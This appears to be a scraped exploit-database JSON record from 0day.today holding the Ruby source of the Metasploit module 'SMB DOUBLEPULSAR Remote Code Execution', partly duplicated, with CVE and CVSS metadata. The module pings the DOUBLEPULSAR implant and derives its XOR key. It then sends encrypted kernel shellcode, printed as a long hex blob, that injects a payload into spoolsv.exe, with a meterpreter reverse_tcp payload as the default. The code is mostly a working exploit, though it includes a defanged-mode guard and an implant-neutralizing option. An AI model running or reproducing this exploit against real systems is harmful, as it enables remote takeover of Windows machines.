proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-15] #"}, "lastseen": "2021-10-14T22:25:08", "differentElements": ["sourceData"], "edition": 44}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "3c6f25e14a8e784437671b108ca54b11", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-10-15T22:16:39", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-15T22:16:39", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-15T22:16:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
